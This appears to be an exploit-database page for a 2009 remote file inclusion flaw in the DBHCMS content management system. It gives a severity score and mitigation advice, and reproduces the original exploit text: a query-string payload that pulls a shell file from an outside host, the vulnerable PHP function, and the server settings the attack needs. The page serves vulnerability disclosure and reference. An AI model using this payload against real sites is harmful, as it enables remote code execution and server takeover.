header-logo
Suggest Exploit
vendor:
DBHCMS - Web Content Management System
by:
Gamoscu
9.3
CVSS
HIGH
Remote File Inclusion (RFI)
98
CWE
Product Name: DBHCMS - Web Content Management System
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

DBHCMS – Web Content Management System RFI Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'dbhcms_core_dir' parameter to the 'index.php' script. A remote attacker can execute arbitrary PHP code on the target system by sending a specially crafted request.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability. Sanitize user-supplied input to prevent malicious code execution.
Source

Exploit-DB raw data:

#############################################################
#  DBHCMS - Web Content Management System RFI Vulnerability
   
    http://www.drbenhur.com/
   
# Author: Gamoscu

# Site: www.1923turk.biz

  https://gamoscu.wordpress.com/


Manas58 - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO


Hosgeldin medine bebek Allah anali babali buyutsun pasam 
  
##############################################################

# Exploit: 
            

Vuln file: index.php


Exploit:


target: ?dbhcms_core_dir=http://site.com/shell.txt%00


/ * Need register_globals = ON and allow_url_include = ON without a second yuzaetsya as LFI * /
 

index.php

function dbhcms_init($core) { 
        $init  = $core.'init.php'; 
        $page  = $core.'page.php'; 
        if ((is_file($init))&&(is_file($page))) { 
            require_once($init); 
            require_once($page); 
        } else { 
            die('<div style="color: #872626; font-weight: bold;"> 
                        FATAL ERROR - Could not find the initialzation files.  
                        Please check the "$dbhcms_core_dir" parameter in the "config.php" and make  
                        shure the directory is correct. 
                    </div>'); 
        } 
    } 
...... 
dbhcms_init($GLOBALS['dbhcms_core_dir']); 




Vatan Lafla Degil Eylemle Sevilir 

Kiskananlar catlasin Zorunuza Gitmesin

Navigation

Suggest Exploit

Services By CQR